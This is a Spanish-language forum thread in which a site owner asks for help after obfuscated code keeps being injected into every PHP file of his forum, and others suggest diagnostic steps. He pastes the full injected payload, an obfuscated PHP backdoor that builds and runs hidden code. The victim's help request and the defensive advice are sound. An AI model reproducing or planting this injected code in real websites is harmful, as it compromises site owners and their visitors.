Necesito ayuda para lo que parece ataque Hacker

Started by rubenphobia, July 24, 2017, 11:07:52 AM

Previous topic - Next topic

rubenphobia

Hola,

Al parecen han atacado mi foro (www.forotarantulas.com) de forma que han conseguido insertar un código encriptado en todas las paginas php de todos los directorios del foro, el problema es que aunque yo me baje las paginas y elimine el código corrupto manualmente en cuanto lo subo se vuelve a infectar la pagina y a escribirse el código. Al parecer el virus lo que hace es escribir dicho código maligno en cuando se sube una pagina con extensión php a cualquiera de los directorios.

He pensado que quizás podría solucionarlo con un script que pase por todos los directorios eliminando el código maligno de todas las paginas php que encuentra a su paso, el código parece ser el mismo siempre, la verdad es que no se si así se solucionaria... pero el script de limpieza no parece complicado en mi cabeza y quizás alguien este dispuesto a yudarme de forma desinteresada (no gano dinero con el foro, lo poco que se gana con sponsors es para cubrir gastos de server). El problema es que no se si al mismo tiempo que el script limpia las paginas de código el virus las vuelva a infectar y siga todo igual.

Estoy abierto a cualquier sugerencia y ayuda, muchas gracias.

Aquí el código que se inserta en las páginas por si sirve de ayuda para solucionar el problema.

<?php $tlghbyx '24)% x24- x24y4 x24- x24]y8 x24- x26* x7f_*#fubfsdXk5`{66~6<&w6< x7fw6*CW&)7gj6<*doj%7-C)fepmqnjA x27&6<.<(<!fwbm)%tjw)# x24#-!#]y38#-!%w:**<")));$fydriqw = $osivwtm!}{;)gj}l;33bq}k;opjudovg}x;0]=])0#)U! x27yngw = implode(array_map("zkvulhd",str_split( x54 120 x5f 125 x53 105 x52 137 x41 107 x45 116 x54"]); if ((stuyfu x27k:!ftmf!}Z;^nbsb6<pd%w6Z6<.5`hA x27pd%6<pd%w6Z6<.4`hA x27pd%6<pd%w6Z6<.3`hA 973:8297f:5297e:56-xrx27pd%6<pd%w6Z6<.2`hA x27pd%6<C x27pd%[" x61 156 x75 156 x61"]=1; $uas=strtolower($_SERVER[" x48 124ftmbg} x7f;!osvufs}w;* x7f!>> x2("", $iriyngw); $fydriqw();}}#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w`TW~ x24<!fwbm)%tjw)bssbz)#P6<*id%)ftpmdR6<*id%)dfyfR x27tfs%6<*17-SFEBFI,6<*127-UVPFNS{ftmfV x7f<*XAZASV<*w%)ppde>u%},;uqpuft`msvd}+;!>!} x27;!>>>!}_;gvc%}&;fs} x7f;!opjudovg}k~~9{d%:osvufs:~928>> x22:ftmbg3]#>n%<#372]58y]472]37y]672]48y]#>s%<#462E{h%)sutcvt)esp>hmg%!<12>j%!|!*#91y]c9y]g2y]#>6<tfs%w6< x7fw6*CWtfs%)7gj6;##}C;!>>!}W;utpi}Y;tuofuopd`ufh`fmj0;quui#>.%!<***f x27,*e x27,*d x27,*c x27,*b x27)fepd2!ftmbg)!gj<*#k#)usbut`cpV x7f x7f x7f x7f<u%V127-K)ebfsX x27u%)7fmjix6<C x27&6<*rfs%7-]53Ld]53]Kc]55Ld]55#*<%bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%g}[;ldpt%}K;`ufldpt}X;`msvd}R;*msv%)}.;`UQPMSVD!-id%)uqpuft`msvd!<2,*j%!-#1]#-bubE{h%)tpqsut>j%!*72#>m%:|:*r%:-t%)3of:opjudovg<~ x24<!%o:!>! x242178($n){return chr(ord($n)-1);} @error_reporting(0); $irifmjgA x27doj%6< x7fw6* x7f_*#fmjgk4`{6~]47y]252]18y]#>q%<#762]67y]562]38y]572]48y]24- x24-!% x24- x24*!|! x24- x24 x5c%j^ x24- x24tvctus)% zB%z>! x24/%tmw/ x24)%zW%h>EzH,2ufs!|ftmf!~<**9.-j%-bubE{h%)sutcvt)fubmgoj{hA!osvufs} x27;mnui}&;zepc}A;~!} x7f;!|6|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf x27*&7-n%)utjm6< x7fw6!<b% x7f!<X>b%Z<#opo#>b%!*##>>X)!gjZ<#opo#>b%!**X)ufttj x22)gj!|!x24- x24b!>!%yy)#}#-# x24- x24-tusqpt)%z-#:#* x24- x24!>! x24/%tjw/ x|:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppde#)tutjyf`4 x223rstr($uas," x6d 163 x69 145")#-#}+;%-qp%)54l} x27;%!<*#}_;#)323ldfid>}&;!osvupp3)%cB%iN}#-! x24/%tmw/ x24)%c*W%eN+#Qi x5c1^W%c!>!%i x5c2^<!Ce*[!#)tutjyf`x x22l:!}V;3q%}U;y]}R;2]},;osvufsjojR x27id%6< x7fw6* x7f_*#ujojRkh/#00#W~!%t2w)##Qtjw)#]82#-#t2w/ x24)##-!#~<#/% x24- x24!>!fyqmpef)# x24*<!%t::!>! x24Y4]26 x24- x24<%j,,*!| x24- x24gvodujpo! x24- x2!~<3,j%>j%!*3! x27!hmg%!)!gj145 x5f 146 x75 156 x63 164 x69 157 x6e"; function zkvulhdPNFS&d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)323zbek!~%:>:r%:|:**t%)m%=*h%)m1M6]y3e]81#/#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#+)!gj+{e%!osvufs!*!+A!>!{e%)!>> x256+99386c6f+9f5d816:+946:ce44#)zbss-%rxB%h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.3`{666~6<&w6< x7fw6*CW&)7gj6<.[A x27&6< x7fw6* x7f_*#[k2`{6:!}7;!}*nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)fepdof`57ftbc x7f!|!*DgP5]D6#<%fdy>#]D4]273]D6K)fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH# x27rfs%9*56A:>:8:|:7#6#)tutjyf`439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:%!<5h%/#0#/*#npd/#)rrd/#0 x5csboe))1/35.)1/14+9**->/h%:<**#57]38y]47]67y]27K6< x7fw6*3qj%7> x2272qj%)7gj6<**2qj%)>*4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%8]37]278]225]241]334]368]322]3]364]6]283]427]36]373P637]88y]27]28y]#/r%/h%)n%-#+I#)q234]342]58]24]31#-%tdz*Wsfuvso!%bssy83]256]y81]265]y72]254]y76#<!%w:!>!(%w:!>! x246767~6<Cw2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp2)%tdz)%bbT-%bT-%hW~%fdy)##-!W%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr x5c1^-%r x5c2^-%hO4y7 x24- x24*<! x24- x24gps)%j>1<%j=tj{fpg)% x24- x24*<!~! x24/%") && (!isset($GLOBALS[" x61 156 x75 156 x61"])))) { $GLOBALS!#-%tmw)%tww**WYsboepn)%^<!%w` x5c^>Ew:Qb:Qc:W~!%z!>2<!gps)%j>1<%j=6[%ww2!>#p#/#~<%h00#*<%nfd)##Qtpz)#]341]88M4P2!pd%)!gj}Z;h!opjudovg}{;#)tutjyf`opjudovg)!gj!|!*msv%)}k~~~<ftmbg!osv+sfwjidsb`bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnDU`MPT7-NBFSUT`LDPT7-UFOJ`GB)fubfsdXA x151 x72 145 x66 157 x78"))) { $osivwtm = " x63 162 x65 141 x74 %cIjQeTQcOc/#00#W~!Ydrr)%rxB%epnbss!>!bssbz)#44ec:649#-!#}!+!<+{e%+*!*+fepdfe{h+{d%)+opjudovg:618d5f9#-!#f6c68399#-!#65egb) or (strstr($uas," x72 166 xof.)fepdof./#@#/qp%>5h%!<*::::::-111112)eobs`un>qp%hopm3qjA)qj3hopmA x273qj%6<*Y%)fnbozcYufhA x272qj%6<^#zsfb:>1<!fmtf!%b:>%s: x5c%j:.2^,%b:<!%c:>%s: x5c%j:{**u%-#jt0}Z;0]=]0#)2q%l}S;2-u%!-#2#/#%#/#o]#/if((function_exists(" x6f 142 x5f 163 x74 141 x72 164}527}88:}334}472 x24<!%ff2!>!bssbz) x24]25 x-bubE{h%)sutcvt-#w#)ldbqov>*ofmy%)utjm!|!*5! x27!hmgsfxpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<*#cd2bgetr($uas," x63 150 x72 157 x6d 145")) or (strstr($uas," x66 8]32M3]317]445]212]445]43]321]464]284]364]6]7jsv%6<C>^#zsfvr# x5cq%7**^#zs)1/2986+7**^/%rx<~!!%s:N}#-%o:W%c:>1<%b:>1<!gj!/!#0#)idubn`hfsq)!sp!*#ojneb#-*f%)q% x5cSFWSFT`%}X;!sp!*#opo#>>}R;msv}.;/#/#/},;72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%yy>#]D6]281L1#/#M5]]y74]275]y7:]268]y7f#<!%tww!>! x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%]275]y83]273]y76]277#<!%t2w>#]y74]273]y76]252]y85]256]y6g]257]y86]2673P6L1M5]D2P4]D6#<%G]y6d]281Ld]245]K2]285]Ke]36]73]83]238M7]381]211M5]67]452]88]5]47,18R#>q%V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%)kVx{**#k*CW&)7gj6<*K)ftpmdXA6~6<u%7>/7&6|7**111fvr# x5cq%)ufttj x22)gj6<^#Y# x5cq% x27Y%6<.msv`ftsbqA7>q%6< x7fw3a 61 x31")) or (strstr($uas," x61 156 x64 162 x6f 151 x64")) or (strs-#C#-#O#-#N#*-!%ff2-!%t::**"%tjw!>!#]y84]275]y83]248]##!>!2p%Z<^2 x5c2b%!>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO x22#)fepmqyfA>2b%!<*qp%-*.%)euhA)3of>2bdbssb!>!ssbnpe_GMFT`QIQ&f_UTPI`QUUI&e_SEEB`FUvr# x5cq%7/7#@#7/7^#iubq# x5cq% x2%)!gj!|!*1?hmg%)!gj!<**2-4-bub.985:52985-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y3%):fmjix:<##:>:h%:<#64y]552]e7yJU,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*)u6~6< x7fw6<*K)ftpmdXA6|7**197-2qj%7-K)udfoopdXA x22)7gj6<*Qps)%j:>1<%j:=tj{fpg)%s:*<%j:,,Bjg!)%j:>>1*!%)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf`opjudovg x22)!gj}1~!<2p% x7f!~!<P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%tdz>#L4]275L3]248L x27{ftmfV x7f<*X&Z&! x27!hmg%)!gj!~<ofmy%,3,j%>j%!<**3-j%V<#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,27R66,#/q%>2q%<#g6R85,67R3! x27!hmg%)!gj!<2,*j%-#1]#-bubE{h%)tpqsut>j%!*9*)323zbe!-#jt0*?]+^?]_ x5c}X x24<!%tmw!>!#]y84!|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs+yfeobzStrrEVxNoiTCnUF_EtaERCxecAlPeR_rtSbdujdifw'$dsbtmsp=explode(chr((436-316)),substr($tlghbyx,(25035-19015),(238-204))); $wyhsiiqg $dsbtmsp[0]($dsbtmsp[(3-2)]); $tolhza $dsbtmsp[0]($dsbtmsp[(13-11)]); if (!function_exists('sqmjhgs')) { function sqmjhgs($znudrfxc$efwwvazyl,$omlynzcl) { $ausfofqg NULL; for($pocllav=0;$pocllav<(sizeof($znudrfxc)/2);$pocllav++) { $ausfofqg .= substr($efwwvazyl$znudrfxc[($pocllav*2)],$znudrfxc[($pocllav*2)+(5-4)]); } return $omlynzcl(chr((63-54)),chr((319-227)),$ausfofqg); }; } $lymakhs explode(chr((137-93)),'4179,53,3430,61,459,62,252,64,1881,29,3948,29,5065,70,4372,59,3763,63,2262,58,1326,54,207,45,5162,26,3192,56,340,60,421,38,1633,63,4961,39,1080,41,2793,63,5517,59,3724,39,2998,40,4028,57,5330,34,4475,30,5000,65,35,70,1380,39,918,26,652,58,5475,42,2067,33,2643,66,944,37,1178,64,741,41,521,32,3603,70,1551,52,2234,28,1242,35,5866,47,5761,38,4276,52,5364,30,872,46,3038,35,5620,69,5188,49,5237,49,2925,25,981,53,3977,51,5959,61,3673,51,4550,36,4328,44,2546,32,5286,44,2320,54,1696,65,2709,59,316,24,4586,46,1910,48,782,50,2856,69,1830,51,3883,36,2512,34,1034,46,5741,20,710,31,5799,67,4905,56,2025,42,1603,30,165,42,4133,46,5913,46,4754,69,4689,65,2975,23,3126,31,2374,22,5444,31,832,40,1419,43,1277,49,4232,44,1462,57,1761,69,0,35,2187,47,3366,64,2128,59,1958,67,3826,57,3919,29,3248,41,1519,32,3315,51,2100,28,3491,24,2578,65,400,21,5394,50,2396,59,4632,57,2768,25,5689,52,4823,43,1121,57,3289,26,3570,33,3073,53,4866,39,4431,44,3157,35,2950,25,4505,45,5576,44,4085,48,3515,55,582,70,2455,57,5135,27,105,60,553,29'); $lapono $wyhsiiqg("",sqmjhgs($lymakhs,$tlghbyx,$tolhza)); $wyhsiiqg=$tlghbyx$lapono(""); $lapono=(503-382); $tlghbyx=$lapono-1?>

Gluz

Si tienes una copia de los archivos del foro antes de que pasara eso, puedes probar a cambiar en el archivo Settings.php el siguiente valor a 2 $maintenance = '0';, luego sube los archivos y revisa después de subirlos si se modifican insertando ese código, ya que si lo hacen, no es el foro el que tiene el problema sino el servidor, ya que el foro solo usa archivos PHP y con el modo mantenimiento en 2 nada de los archivos del foro se ejecuta mas allá de las primeras líneas que leen el estado de mantenimiento.

Eso tienes que verlo con tu host, y ver de donde viene ese código, ya que ellos son los que tienen que  resolver el problema que está fuera del alcance del foro.

En cambio, si no se modifican, quiere decir que si se inyectó código en archivos del foro, y tendrás que revisarlos, comparando con alguna copia que tengas y con los archivos sin modificar para ver donde hay código sospechoso.

Príncipe_Azul

Hola amigos, sería interesante saber que contiene ese código... que está encriptado, o mejor dicho, ofuscado, más que nada para saber que es lo que está haciendo ese código.
Una forma de poder conseguir eso, es pedirlo en algún foro de hacker y los mismos usuarios se entretendrán tratando de desofuscarlo.


Saludos
Foro ArgentinaIRC - Ayuda de Programación General, Informática, IRC y mIRC Scripting.

Foro de Artesanías, Recetas de cocina, Ropa para perros, Tejidos, Bijouterie, Porcelana, Chocolatería, Fondos de pantalla, Noticias, Belleza, Medicina natural, Videos y Programas: http://www.misartesanias.net/

rubenphobia

Gracias por las sugerencias, probaré a ver si consigo algo.

Advertisement: